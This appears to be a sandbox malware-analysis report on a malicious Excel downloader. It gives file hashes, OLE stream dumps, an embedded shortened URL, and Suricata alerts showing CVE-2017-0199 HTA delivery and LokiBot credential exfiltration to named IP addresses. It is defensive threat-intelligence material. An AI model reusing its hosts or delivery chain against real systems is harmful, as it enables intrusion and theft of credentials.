SHA512:	c07fab2453f8efbb4c37a5b53e2f29574c770d07b4ba3ead5b07b2365c8214863f273474091fe54bdafcd024fa236ab4c97e32bd8bbb68f75378247b27d62ab3
SSDEEP:	1536:NiqHy1S6F8b2SQrEkawpoXIoAD4qBYs8N3Ff6iugVOUYoFMz7C9Rvrp2CU:3eFHrE2sIo8LQt6yTMvIrp
TLSH:	AFA3F12433A2C815D4563B368FD6C2FF866AFC46DDE1885B3289732E583A3C5D85360B
File Content Preview:	........................>...................................N...................P..............................................................................................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:	WORMS
Last Saved By:	91974
Create Time:	2013-09-08T10:39:32Z
Last Saved Time:	2024-10-22T13:14:21Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	false
Company:	MAHIEDDINE
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 6b ab 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x J . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 78 4a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 45 9a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 eb a7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2465758799941646
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . . % . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD0002353C/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD0002353C/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0002353C/Package, File Type: Microsoft Excel 2007+, Stream Size: 38341

General
Stream Path:	MBD0002353C/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	38341
Entropy:	7.85773182578822
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0002353D/\x1Ole, File Type: data, Stream Size: 348

General
Stream Path:	MBD0002353D/\x1Ole
CLSID:
File Type:	data
Stream Size:	348
Entropy:	6.259245825083567
Base64 Encoded:	True
Data ASCII:	. . . . ] K g _ U . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . m . p . a . . . l . i . / . Z . D . F . W . t . O . . . " B U v . . ! 8 m o . w [ V r . # . . . o R . O . u G T 0 , ` . < . / F C 5 s . Y . C ? ~ ( . F k . . . - . i [ c . ? g { N " . 1 < $ W A y . R . ` . > M j . E O ] 7 " J . @ . . . . . . . . . . . . . . . . . . . l . 8 . V . q . p . U . C . Z . 1 . x . y . x . G . n . A . . . Y ) i c S 1 . . . . O . e x ` L
Data Raw:	01 00 00 02 5d dc 4b 67 84 fc 5f 55 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b d8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6d 00 70 00 61 00 2e 00 6c 00 69 00 2f 00 5a 00 44 00 46 00 57 00 74 00 4f 00 00 00 22 42 55 a5 95 d4 76 88 e6 85 bc 00 21 9b 38 6d a9 9f 6f 12 77 a1 99 5b 56 72 e7 11 23 e8 b6 a7 15 1f de 6f

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 47151

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	47151
Entropy:	7.974648382107662
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . L . M . $ G . z P P [ P - F . , . n . . + . . . . . . . . . . \\ . p . . < ` . M W + 9 x & . . q ~ ~ ^ ' i . . . L M . m ^ . ( 5 . V b . 5 4 ` . . V { g t . . d x ; W ^ ) B . . . . E ` < B . . . K a . . . U . . . = . . . . & / 5 . . . % R 3 . . P . . . z . . . . L . . . . % . . . . . . . . . . . . . 1 = . . . _ . a . . ? 4 @ . . . v . . . . . p " . . . . . . . . . . . . . . \| . 1 . . . * . ` } . S H N . j e T ! ) m . 1 . . . . [ \| . - C . @ 3 5 1 . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a7 f6 4c 20 a5 de 88 e7 9d fd ad 4d c4 18 24 47 8a a6 ce 80 c2 7a 84 50 50 5b dd fa 82 b4 b1 fa 50 a6 2d eb 46 01 ee 2c 9f 10 6e 1a 16 2b c9 df e1 00 02 00 b0 04 c1 00 02 00 b0 ab e2 00 00 00 5c 00 70 00 9b 06 3c f2 60 09 f3 4d da 57 2b 39 f5 78 26 d1 09 13 71 d2 7e 7e fe 5e 98 27 cf f0 69 07

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.206761699325734
Base64 Encoded:	True
Data ASCII:	I D = " { F 8 B 6 F E C 7 - 5 0 F 5 - 4 2 5 3 - B 4 8 A - 8 B B 2 E 3 C 2 F 4 4 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 0 E 2 E 2 E 0 E 6 E 0 E 6 E 0 E
Data Raw:	49 44 3d 22 7b 46 38 42 36 46 45 43 37 2d 35 30 46 35 2d 34 32 35 33 2d 42 34 38 41 2d 38 42 42 32 45 33 43 32 46 34 34 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9969155616504612
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.375447957757399
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . + i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c1 e1 2b 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T21:22:37.665253+0200	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49164	192.3.176.141	80	TCP
2024-10-24T21:22:37.665307+0200	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.176.141	80	192.168.2.22	49164	TCP
2024-10-24T21:22:43.229261+0200	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49166	192.3.176.141	80	TCP
2024-10-24T21:22:43.229274+0200	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.176.141	80	192.168.2.22	49166	TCP
2024-10-24T21:23:11.639661+0200	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	172.217.16.193	443	192.168.2.22	49169	TCP
2024-10-24T21:23:25.857786+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:25.857786+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:25.857786+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:26.886644+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:29.808663+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:30.931919+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:30.931919+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:30.937971+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49173	TCP
2024-10-24T21:23:31.085554+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:31.085554+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:31.085554+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.518744+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.518744+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.525580+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49174	TCP
2024-10-24T21:23:32.718723+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:32.718723+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:32.718723+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:33.892143+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:33.892143+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:34.305427+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49175	TCP
2024-10-24T21:23:34.319094+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:34.319094+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:34.319094+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.394614+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.394614+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.400835+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49176	TCP
2024-10-24T21:23:36.550346+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:36.550346+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:36.550346+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.743711+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.743711+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.750078+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49177	TCP
2024-10-24T21:23:37.888749+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:37.888749+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:37.888749+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:38.952622+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:38.952622+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:38.958628+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49178	TCP
2024-10-24T21:23:39.094384+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:39.094384+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:39.094384+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:40.186012+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49179	94.156.177.220	80	TCP
